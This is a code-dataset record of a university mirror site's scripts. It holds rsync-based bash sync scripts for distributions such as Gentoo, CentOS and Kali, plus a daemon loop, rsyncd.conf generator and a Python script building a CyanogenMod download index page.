item.find_elements_by_xpath('./div/div/div')\n\n hospital = div1[0].text\n print(hospital)\n\n slots = div1[1].find_elements_by_xpath('./ul/li')\n\n for elem in slots:\n print('\\n')\n print(elem.text)\n" } ]
2
UniqueStudio/mirrors-script
https://github.com/UniqueStudio/mirrors-script
cb3424ad78964bc39a8f4441ffe79f0474663a9d
56ad14401437f270ee718b5eb73baa7217fe5189
8277a49bda170bdb0a493720610d799279783b16
refs/heads/master
2021-01-20T09:09:29.664705
2013-12-28T12:25:59
2013-12-28T12:25:59
12,813,701
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7527352571487427, "alphanum_fraction": 0.7768052220344543, "avg_line_length": 40.54545593261719, "blob_id": "67219f303e0e651ab632293dadc6331cffe65f70", "content_id": "c429185eee8a08b252607b1eda523484e03cf079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 457, "license_type": "no_license", "max_line_length": 184, "num_lines": 11, "path": "/syncbin/gentoo", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=gentoo\n_UPSTREAM=rsync://rsync1.cn.gentoo.org/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --exclude releases/.test/THIS-FILE-SHOULD-NOT-BE-PUBLIC.txt --exclude distfiles/.~tmp~\"\n_TIMESTAMP_PATHS=\"/distfiles/timestamp.chk,/experimental/timestamp.chk,/snapshots/portage-latest.tar.bz2.md5sum,/snapshots/portage-latest.tar.xz.md5sum,/releases/.timestamp-releases.x\"\n" }, { "alpha_fraction": 0.5221476554870605, "alphanum_fraction": 0.5382550358772278, "avg_line_length": 18.102563858032227, "blob_id": "827f71ad18024bf010a0f8940c3b9f2499f6fd0b", "content_id": "02efd868f49294021f1292abdba55213c3ae2465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 745, "license_type": "no_license", "max_line_length": 67, "num_lines": 39, "path": "/syncbin/rubygems", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_sync() {\n HOME=/home/mirror\n gem mirror\n HOME=/root\n RETVAL=$?\n cd $OWD\n return $RETVAL\n}\n\n_get_upstream() {\n echo \"https://production.cf.rubygems.org/\"\n}\n\n_get_next_sync_time() {\n _CURTIME=`date +%s`\n _DELTA=900\n echo $(( $_CURTIME + $_DELTA ))\n}\n\n_get_size() {\n OLD=$(kvdb_local_get last_du_time)\n if [ \"0$OLD\" -eq \"0\" ]; then\n OLD=0\n fi\n NOW=`date +%s`\n let P=NOW-OLD\n if [ \"$P\" -lt \"86400\" ]; then\n kvdb_local_get last_du_value\n else\n NSIZE=`du \"$MIRRORROOT/rubygems\" -sh | awk '{ print $1; }'`\n kvdb_local_set last_du_value \"$NSIZE\"\n kvdb_local_set last_du_time \"$NOW\"\n echo \"$NSIZE\"\n fi\n}\n" }, { "alpha_fraction": 0.7305389046669006, "alphanum_fraction": 0.7784430980682373, "avg_line_length": 17.44444465637207, "blob_id": "473575f2c87c4e18ec4f5a2902f3bec1e43dd7cc", "content_id": "8180350ddc8c728207114bfd6a7489e24ff39f2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 167, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/syncbin/linuxmint", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=linuxmint\n_UPSTREAM=rsync://packages.linuxmint.com/packages/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7197802066802979, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "0b1ef9327a26b6ad39238105fe8046ef8677b1a1", "content_id": "d44c0f8f270a74714389b3acff53dc8085c6493e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 182, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/syncbin/centos", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=centos\n_UPSTREAM=rsync://us-msync.centos.org/CentOS/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/TIME\"\n" }, { "alpha_fraction": 0.6331236958503723, "alphanum_fraction": 0.6373165845870972, "avg_line_length": 42.3636360168457, "blob_id": "01c7eefdc0ddedff241f901f25f34697b81f0d79", "content_id": "61a1780913cb78b073c4f2244c808f14ee2b04d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 477, "license_type": "no_license", "max_line_length": 103, "num_lines": 11, "path": "/gen_rsyncd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\nMIRRORDATA=\"/home/mirror/mirrordata\"\necho -e \"# This file will be overwritten by gen_rsyncd script.\\n# Do NOT modify by hand.\" > rsyncd.conf\ncat rsyncd.conf.header >> rsyncd.conf\nfor i in `ls $MIRRORDATA/`; do\n echo \"[$i]\" >> rsyncd.conf\n echo \"path = $MIRRORDATA/$i\" >> rsyncd.conf\n SIZE=$( cat /home/mirror/mirrorweb/status/${i}.json | egrep -o '\"[0-9.]+[TKMG]\"' | tr -d '\"' )\n echo \"comment = size: $SIZE\" >> rsyncd.conf\n echo >> rsyncd.conf\ndone\n" }, { "alpha_fraction": 0.7197802066802979, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "bf7c92a7c9e283997d9e5ea03803ff366f35081d", "content_id": "aa48e78c38fba2128d2faa149ea9a22e93e19be0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 182, "license_type": "no_license", "max_line_length": 38, "num_lines": 10, "path": "/syncbin/xbmc", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=xbmc\n_UPSTREAM=rsync://rsync.xbmc.org/euro/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/timestamp.txt\"\n" }, { "alpha_fraction": 0.6080368757247925, "alphanum_fraction": 0.6280193328857422, "avg_line_length": 34.85039520263672, "blob_id": "f1df85d15f3879542f4c242938a1aea44a6dceb3", "content_id": "817ef66277fc7b5a4cf29db7583cd76a6cb5b776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4554, "license_type": "no_license", "max_line_length": 159, "num_lines": 127, "path": "/sync_core", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nSERVERNAME=$( hostname --fqdn ) # added a space before `)' to fix vim syntax highlighting issue\n\nfunction kvdb_global_get_file_name() {\n DBF=\"$KVDBROOT/global.kc\"\n if [[ ! -f \"$DBF\" ]]; then\n kchashmgr create \"$DBF\" 2>/dev/null\n fi\n echo \"$DBF\"\n}\n\nfunction kvdb_local_get_file_name() {\n DBF=\"$KVDBROOT/local.$DISTRO.kc\"\n if [[ ! -f \"$DBF\" ]]; then\n kchashmgr create \"$DBF\" 2>/dev/null\n fi\n echo \"$DBF\"\n}\n\nfunction kvdb_global_get() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr get \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_global_set() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr set \"$DBF\" \"$1\" \"$2\" 2>/dev/null\n}\n\nfunction kvdb_global_remove() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr remove \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_global_clear() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr clear \"$DBF\" 2>/dev/null\n}\n\nfunction kvdb_local_get() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr get \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_local_set() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr set \"$DBF\" \"$1\" \"$2\" 2>/dev/null\n}\n\nfunction kvdb_local_remove() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr remove \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_local_clear() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr clear \"$DBF\" 2>/dev/null\n}\n\nsource \"$SCRIPTROOT/syncbin/$1\"\n\nGenJSON='import json;from itertools import izip;import sys;i=iter(sys.argv[1:]);print json.dumps(dict(izip(i,i)))'\n\nSIZE=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"size\" in p and p[\"size\"] or -1')\nLASTSYNC=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"lastsync\" in p and p[\"lastsync\"] or -1')\nNEXTSYNC=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"nextsync\" in p and p[\"nextsync\"] or -1')\nLASTSTATUS=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"status\" in p and p[\"status\"] or -1')\nUPSTREAM=$(_get_upstream)\n\npython -c \"$GenJSON\" upstream \"$UPSTREAM\" size \"$SIZE\" status syncing lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\n\nif [[ ! -d \"$LOGROOT/$1\" ]]; then\n mkdir -p \"$LOGROOT/$1\"\nfi\n\nlogrotate() {\n for ((i=13; i>=0; i--)); do\n j=$((i+1))\n mv \"$LOGROOT/$1/log.stdout.$i\" \"$LOGROOT/$1/log.stdout.$j\" 2>/dev/null\n mv \"$LOGROOT/$1/log.stderr.$i\" \"$LOGROOT/$1/log.stderr.$j\" 2>/dev/null\n mv \"$LOGROOT/$1/log.outerr.$i\" \"$LOGROOT/$1/log.outerr.$j\" 2>/dev/null\n done\n cp \"$LOGROOT/$1/log.stdout\" \"$LOGROOT/$1/log.stdout.0\"\n cp \"$LOGROOT/$1/log.stderr\" \"$LOGROOT/$1/log.stderr.0\"\n cp \"$LOGROOT/$1/log.outerr\" \"$LOGROOT/$1/log.outerr.0\"\n}\n\nrm -f \"$LOGROOT/$1/log.stdout\"\nrm -f \"$LOGROOT/$1/log.stderr\"\nrm -f \"$LOGROOT/$1/log.outerr\"\n\ndate -u > \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\";\n\n_SAVELOG=1\n_sync > >(tee -a \"$LOGROOT/$1/log.outerr\" > \"$LOGROOT/$1/log.stdout\") 2> >(tee -a \"$LOGROOT/$1/log.outerr\" > \"$LOGROOT/$1/log.stderr\")\nRETVAL=$?\n\nif [[ \"$_SAVELOG\" == \"1\" ]]; then\n logrotate \"$1\";\nfi\n\nif [[ $RETVAL == 0 || $RETVAL == 23 ]]; then\n LASTSTATUS=success\n if [[ -f \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\" ]]; then\n rm \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\"\n fi\n SIZE=$(_get_size)\n NEXTSYNC=$(_get_next_sync_time)\n LASTSYNC=$(date +%s)\n python -c \"$GenJSON\" upstream \"$UPSTREAM\" size \"$SIZE\" status success lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\n _post_sync > >(tee -a \"$LOGROOT/$1/log.outerr\" >> \"$LOGROOT/$1/log.stdout\" ) 2> >(tee -a \"$LOGROOT/$1/log.outerr\" >> \"$LOGROOT/$1/log.stderr\")\nelif [[ $RETVAL == 5 ]]; then\n LASTSTATUS=failed\n if [[ -f \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\" ]]; then\n rm \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\"\n fi\n NEXTSYNC=$(_get_next_sync_time)\n python -c \"$GenJSON\" upstream \"$UPSTREAM\" size \"$SIZE\" status success lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\nelse\n LASTSTATUS=failed\n if [[ -f \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\" ]]; then\n rm \"$MIRRORROOT/$1/Archive-Update-in-Progress-${SERVERNAME}\"\n fi\n NEXTSYNC=$(_get_next_sync_time)\n python -c \"$GenJSON\" upstream \"$UPSTREAM\" size \"$SIZE\" status failed lastsync \"$LASTSYNC\" nextsync \"$NEXTSYNC\" name $1 > \"$STATUSROOT/$1.json\" 2>/dev/null\nfi\n\n" }, { "alpha_fraction": 0.5013850331306458, "alphanum_fraction": 0.5146814584732056, "avg_line_length": 30.946903228759766, "blob_id": "2cff51a773f37684711df778e037c5c893b88db1", "content_id": "69213622389a385a3886eb3aa631d9421b5babd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3610, "license_type": "no_license", "max_line_length": 141, "num_lines": 113, "path": "/syncbin/.rsync_base", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This file should be source'd ***BEFORE*** anything in sync scripts!\n# \n# The following functions and variables can be overridden in order to support\n# different syncing requirements.\n\n_RSYNC_ARGS=\"-aHvh --delete --delete-delay --stats --safe-links --timeout=120 --contimeout=120 --delay-updates\"\n\n_check_updated() {\n set +x\n if [[ -n \"$_TIMESTAMP_PATHS\" ]]; then\n echo \"Checking timestamps...\"\n __TIMESTAMP_PATHS=$( echo \"$_TIMESTAMP_PATHS\" | tr ',' '\\n' )\n __PATHS_COUNT=$( echo \"$__TIMESTAMP_PATHS\" | wc -l )\n for ((i=1; i<=$__PATHS_COUNT; i++)); do\n _TIMESTAMP_PATH=$( echo \"$__TIMESTAMP_PATHS\" | sed -n \"${i}p\" )\n if [[ -n \"$_TIMESTAMP_PATH\" ]]; then\n _TIMESTAMP_PATH_LOCAL=$(echo \"$_TIMESTAMP_PATH\" | cut -d= -f2)\n _TIMESTAMP_PATH=$(echo \"$_TIMESTAMP_PATH\" | cut -d= -f1)\n if [[ -z \"$_TIMESTAMP_PATH_LOCAL\" ]]; then\n _TIMESTAMP_PATH_LOCAL=\"$_TIMESTAMP_PATH\"\n fi\n _TIMESTAMP_TEMP=$( mktemp \"/tmp/${_REPO}.XXXXX\" )\n rsync -q --timeout=20 --contimeout=20 --no-motd \"${_UPSTREAM%\\/}/${_TIMESTAMP_PATH#\\/}\" \"$_TIMESTAMP_TEMP\"\n local RETVAL=$?\n if [[ \"$RETVAL\" != \"0\" ]]; then\n echo \"Errors occurred ($RETVAL) while checking timestamp\"\n rm $_TIMESTAMP_TEMP\n set -x; return 1\n fi\n if cmp -s \"$MIRRORROOT/$_REPO/${_TIMESTAMP_PATH_LOCAL#\\/}\" \"$_TIMESTAMP_TEMP\"; then\n echo \"Remote ${_TIMESTAMP_PATH} is the same as local ${_TIMESTAMP_PATH_LOCAL}\"\n else\n echo \"Remote ${_TIMESTAMP_PATH} is different from local ${_TIMESTAMP_PATH_LOCAL}\"\n rm $_TIMESTAMP_TEMP\n set -x; return 1\n fi\n rm $_TIMESTAMP_TEMP\n fi\n done\n set -x; return 0\n fi\n set -x; return 1\n}\n\n_sync () {\n set +x\n mkdir -p $MIRRORROOT/$_REPO\n cd $MIRRORROOT/$_REPO\n if [[ $? != 0 ]]; then\n return 1\n fi\n if _check_updated; then\n echo \"Remote timestamp is the same as local timestamp.\"\n echo \"No actual sync will be performed.\"\n _SAVELOG=0\n return 0\n fi\n set -x\n rsync $_UPSTREAM . $_RSYNC_ARGS\n RETVAL=$?\n cd $OWD\n return $RETVAL\n}\n\n_post_sync () {\n return 0; # This is a stub\n}\n\n_get_upstream () {\n echo $_UPSTREAM\n}\n\n_upstream_inconsistent () {\n ls $MIRRORROOT/$_REPO/Archive-Update-in-Pro* &>/dev/null\n return $?\n}\n\n_get_next_sync_time () {\n _CURTIME=$(date +%s)\n _DELTA=$_SYNCEVERY\n if [[ \"$_DELTA\" -ge \"1800\" ]]; then\n _DELTA=$( echo $((_DELTA + RANDOM % 5400 - 3600)) 1800 | xargs python -c 'import sys;print max(int(sys.argv[1]), int(sys.argv[2]))' )\n fi\n if _upstream_inconsistent &>/dev/null; then\n _DELTA=$_FAILRETRY\n fi\n if [[ \"$LASTSTATUS\" == \"failed\" ]]; then\n OLD=$(kvdb_local_get failure_times)\n if [[ \"$?\" -gt \"0\" ]]; then\n OLD=0\n fi\n if [[ \"$OLD\" -lt \"$_FAILRETRIES\" ]]; then\n kvdb_local_set failure_times $((OLD+1))\n _DELTA=$_FAILRETRY\n else\n kvdb_local_set failure_times 0\n fi\n else\n kvdb_local_set failure_times 0\n fi\n echo $(( $_CURTIME + $_DELTA ))\n}\n\n_get_size () {\n _STDOUT=$LOGROOT/$_REPO/log.stdout\n if grep \"No actual sync will be performed\" $_STDOUT >/dev/null; then\n echo \"$SIZE\"\n else\n tail -n1 $_STDOUT | cut -d' ' -f4\n fi\n}\n" }, { "alpha_fraction": 0.7050691246986389, "alphanum_fraction": 0.7373272180557251, "avg_line_length": 18.727272033691406, "blob_id": "05521b59bcbc0af8d5acf76e391a955f52184d49", "content_id": "1904def039ab47c395642fad75a7f03cd98af803", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 217, "license_type": "no_license", "max_line_length": 42, "num_lines": 11, "path": "/syncbin/mariadb", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=mariadb\n_UPSTREAM=rsync://rsync.osuosl.org/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --partial\"\n_TIMESTAMP_PATHS=\"/TIME\"\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7327935099601746, "avg_line_length": 18, "blob_id": "0d91fe0874acf522950c8496d7065d269f60d121", "content_id": "9b181409198c8ecd503212606302b70cd8ba194b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "no_license", "max_line_length": 61, "num_lines": 13, "path": "/syncbin/rpmfusion", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=rpmfusion\n_UPSTREAM=rsync://mirror1.hs-esslingen.de/$_REPO/\n_SYNCEVERY=14400\n_FAILRETRY=600\n_FAILRETRIES=4\n\n_post_sync () {\n $SCRIPTROOT/report_mirror -c \"$SCRIPTROOT/rpmfusion.conf\"\n}\n" }, { "alpha_fraction": 0.7340824007987976, "alphanum_fraction": 0.7640449404716492, "avg_line_length": 23.272727966308594, "blob_id": "5741c523a565425a5c7dd9d824ecd0f36668a4f8", "content_id": "d7649ebb6cedfb796287d0eb3439d5fcc9cb9c16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 267, "license_type": "no_license", "max_line_length": 56, "num_lines": 11, "path": "/syncbin/kali", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=kali\n_UPSTREAM=rsync://kali.mirror.garr.it/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_UPSTREAM_HTTP=http://kali.mirror.garr.it/mirrors/kali\n_TIMESTAMP_PATHS=\"/project/trace/mirror3.mirror.garr.it\"\n" }, { "alpha_fraction": 0.5898959636688232, "alphanum_fraction": 0.6114413142204285, "avg_line_length": 28.91111183166504, "blob_id": "6588acb215e0e9d251c6d9280b4348e3875c3e02", "content_id": "a8bd4f8b682e463e16aa6d7a3088ccb63c44a598", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1346, "license_type": "no_license", "max_line_length": 139, "num_lines": 45, "path": "/sync_daemon", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncd $(dirname $0)\nexport CWD=$(pwd)\nexport OWD=$(pwd)\nexport MIRRORROOT=/home/mirror/mirrordata\nexport LOGROOT=/home/mirror/mirrorlog\nexport STATUSROOT=/home/mirror/mirrorweb/status/\nexport WEBROOT=/home/mirror/mirrorweb\nexport SCRIPTROOT=/home/mirror/scripts\nexport KVDBROOT=/home/mirror/statuskv\nexport DISTRO=$1\n\nmkdir -p \"$MIRRORROOT/$1\"\nmkdir -p \"$LOGROOT/$1\"\n\nNOW=$(date +%s)\nNEXT=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"nextsync\" in p and p[\"nextsync\"] or -1')\nif [[ \"$NEXT\" -ge \"$NOW\" ]]; then\n WAIT=$((NEXT-NOW))\n sleep $WAIT\nfi\n\nwhile true; do\n# for ((i=13;i>=0;i--)); do \n# j=$((i+1))\n# mv \"$LOGROOT/$1/sync_core.log.$i\" \"$LOGROOT/$1/sync_core.log.$j\"\n# done\n# mv \"$LOGROOT/$1/sync_core.log\" \"$LOGROOT/$1/sync_core.log.0\"\n# bash -x ./sync_core $1 >& \"$LOGROOT/$1/sync_core.log\"\n bash -x ./sync_core $1 2>&1\n if [[ $? != 0 ]]; then\n echo \"($1) CORE CORRUPTION DETECTED!!! SLEEPING 60 SECONDS...\"\n sleep 60\n continue\n fi\n NEXTSYNC=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"nextsync\" in p and p[\"nextsync\"] or -1')\n NOW=`date +%s`\n SLEEPTIME=$((NEXTSYNC-NOW))\n if [[ \"$SLEEPTIME\" -le \"0\" ]]; then\n continue\n else\n sleep \"$SLEEPTIME\"\n fi\ndone\n" }, { "alpha_fraction": 0.5486546158790588, "alphanum_fraction": 0.5650702118873596, "avg_line_length": 32.95977020263672, "blob_id": "f2791478932a7b7cf045a139684a73e689d26828", "content_id": "e9ac1b0137ca69559c0e32cd84a7098e2b648bc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5909, "license_type": "no_license", "max_line_length": 478, "num_lines": 174, "path": "/cm_dir_index", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport re\nimport subprocess\n\nHEADER=\"\"\"\n<!doctype html>\n<html>\n\t<head>\n\t\t<meta charset=\"UTF-8\">\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n\t\t<title data-localize=\"title\">CyanogenMod Directory Index - HUST Open Source Mirrors</title>\n\t\t<link href=\"/assets/css/bootstrap.min.css\" rel=\"stylesheet\"/>\n\t\t<style type=\"text/css\">\n\t\t\thtml,\n\t\t\tbody {\n\t\t\t\theight: 100%;\n\t\t\t}\n\t\t\t.container,\n\t\t\t.navbar-fixed-top .container{\n\t\t\t\twidth: 80%;\n\t\t\t}\n\t\t\t.container .credit {\n\t\t\t\tmargin: 13px 0;\n\t\t\t}\n\t\t\t.centerblock {\n\t\t\t\ttext-align: center;\n\t\t\t}\n\t\t\t#wrap {\n\t\t\t\tmin-height: 100%;\n\t\t\t\theight: auto !important;\n\t\t\t\theight: 100%;\n\t\t\t\tmargin: 0 auto -80px;\n\t\t\t}\n\t\t\t#push,\n\t\t\t#footer {\n\t\t\t\theight: 80px;\n\t\t\t}\n\t\t\t#footer {\n\t\t\t\tbackground-color: #f5f5f5;\n\t\t\t}\n\t\t\t#wrap > .container {\n\t\t\t\tpadding-top: 60px;\n\t\t\t}\n\t\t</style>\n\t</head>\n\t<body>\n\t\t<div id=\"wrap\">\n\t\t\t<div class=\"navbar navbar-fixed-top navbar-inverse\">\n\t\t\t\t<div class=\"navbar-inner\">\n\t\t\t\t\t<div class=\"container\">\n\t\t\t\t\t\t<a class=\"brand\" href=\"/\" data-localize=\"main-name\">HUST Open Source Mirrors</a>\n\t\t\t\t\t\t<ul class=\"nav\">\n\t\t\t\t\t\t\t<li><a href=\"/\" data-localize=\"nav.home\">Home</a></li>\n\t\t\t\t\t\t\t<li><a href=\"/help\" data-localize=\"nav.help\">Help</a></li>\n\t\t\t\t\t\t\t<li><a href=\"/graph\" data-localize=\"nav.graph\">Graph</a></li>\n\t\t\t\t\t\t</ul>\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t<div class=\"container\">\n\t\t\t\t<div class=\"centerblock\">\n\t\t\t\t\t<h1 data-localize=\"title\">CyanogenMod Directory Index</h1>\n\t\t\t\t\t<p class=\"lead\">Tip: Use Ctrl-F to search for your device.</p>\n\"\"\"\nTABLE_HEADER=\"\"\"\n\t\t\t\t\t<table class=\"table\">\n\t\t\t\t\t\t<tr><th>Build type</th><th>File name</th><th>CM Version</th><th>Device codename</th></tr>\n\"\"\"\nTABLE_FOOTER = \"\"\"\n\t\t\t\t\t</table>\"\"\"\n\nFOOTER=\"\"\"\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t<div id=\"push\"></div>\n\t\t</div>\n\t\t<div id=\"footer\">\n\t\t\t<div class=\"container centerblock\">\n\t\t\t\t<p class=\"muted credit\" data-localize=\"credit\">This site is brought to you by <a href=\"http://qiming.hust.edu.cn/\" target=\"qiming\">Qiming College, HUST</a> and <a href=\"http://www.hustunique.com/\" target=\"_blank\">Unique Studio</a>.</p>\n\t\t\t\t<p class=\"muted credit\" data-localize=\"contact\">Contact us at <a href=\"http://www.google.com/recaptcha/mailhide/d?k=01h7Er0RVnO4wvIFgIk2lR-g==&c=-7_mZ8fYpJyWgM9qxj57zKaij5zJpRkBUBNpq2619zs=\" target=\"_blank\" onclick=\"window.open('http://www.google.com/recaptcha/mailhide/d?k=01h7Er0RVnO4wvIFgIk2lR-g==&c=-7_mZ8fYpJyWgM9qxj57zKaij5zJpRkBUBNpq2619zs=', '', 'toolbar=0,scroolbars=0,location=0,menubar=0,resizable=0,width=500,height=300');return false;\">our email address</a></p>\n\t\t\t</div>\n\t\t</div>\n\t\t<script src=\"/assets/js/jquery.min.js\" type=\"text/javascript\"></script>\n\t\t<script src=\"/assets/js/jquery.localize.js\" type=\"text/javascript\"></script>\n\t\t<script type=\"text/javascript\">\n\t\tl10nopts = {\n\t\t\tskipLanguage: [\"en\", \"en-US\"],\n\t\t\tpathPrefix: \"/l10n\"\n\t\t};\n\t\t$('[data-localize]').localize('cmindex', l10nopts);\n\t\t</script>\n\t</body>\n</html>\n<!-- Written by Qijiang Fan and Haochen Tong in Vim -->\n<!-- IT Service Team @ Unique Studio -->\n\"\"\"\n\nCMROOT=\"/home/mirror/mirrordata/cm/\"\n\ndef parse_filename(f):\n info = {'cmver': '???', 'device': '???', 'name':'', 'path':'', 'type': 'Stable', 'changelog': ''}\n r = f.split('/')[-1][:-4]\n d = r\n if r.endswith('-signed'):\n r = r[:-7]\n if r.startswith('update-'):\n r = r[7:]\n info['path'] = f\n info['name'] = d\n info['changelog'] = '/'.join(f.split('/')[:-1]) + \"/CHANGES.txt\"\n fields = r.split('-')[1:]\n for i in range(len(fields)):\n if i == 0:\n info['cmver'] = fields[i]\n elif i == 1:\n if re.match(r\"\\d{8}\", fields[i]):\n continue\n elif re.match(r\"RC\\d+\", fields[i]):\n info['cmver'] += '-' + fields[i]\n info['type'] = \"RC\"\n else:\n info['device'] = fields[i]\n elif i == 2:\n if fields[i] == \"NIGHTLY\" or fields[i] == \"SNAPSHOT\":\n info['type'] = \"Nightly\"\n elif fields[i] == \"EXPERIMENTAL\":\n info['type'] = \"Experimental\"\n else:\n info['device'] = fields[i]\n elif i == 3:\n info['device'] = fields[i]\n else:\n break # stop searching\n\n return info\n\n\ndef generate_most_recent(files, count):\n output = open(CMROOT + \"index.html\", \"w\")\n output.write(HEADER)\n output.write('<p class=\"lead\">Only the most recent 60 builds are shown. See <a href=\"all.html\">full list</a> here.</p>\\n')\n output.write(TABLE_HEADER)\n i = 0\n for f in files:\n if i > count:\n break\n info = parse_filename(f)\n output.write('<tr><td>%s</td><td><a href=\"/cm%s\">%s</a> (<a href=\"/cm%s\">ChangeLog</a>)</td><td>%s</td><td>%s</td></tr>\\n' %\n (info['type'], info['path'], info['name'], info['changelog'], info['cmver'], info['device']))\n i += 1\n\n output.write(TABLE_FOOTER + FOOTER)\n output.close()\n\n\ndef generate_directory_index(files):\n output = open(CMROOT + \"all.html\", \"w\")\n output.write(HEADER + TABLE_HEADER)\n result = subprocess.check_output(r\"find \" + CMROOT + \" -name '*.zip' -type f -printf '%T@ %p\\n' | sort -k 1nr | sed -e 's/^[^ ]* //' -e 's#\" + CMROOT + \"##'\", shell=True)\n for f in files:\n info = parse_filename(f)\n output.write('<tr><td>%s</td><td><a href=\"/cm%s\">%s</a></td><td>%s</td><td>%s</td></tr>\\n' %\n (info['type'], info['path'], info['name'], info['cmver'], info['device']))\n\n output.write(TABLE_FOOTER + FOOTER)\n output.close()\n\nif __name__ == '__main__':\n cmd = r\"find %s/jenkins %s/jenkins-test -name '*.zip' -type f -printf '%%T@ %%p\\n' | sort -k 1nr | sed -e 's/^[^ ]* //' -e 's#%s##'\" % (CMROOT, CMROOT, 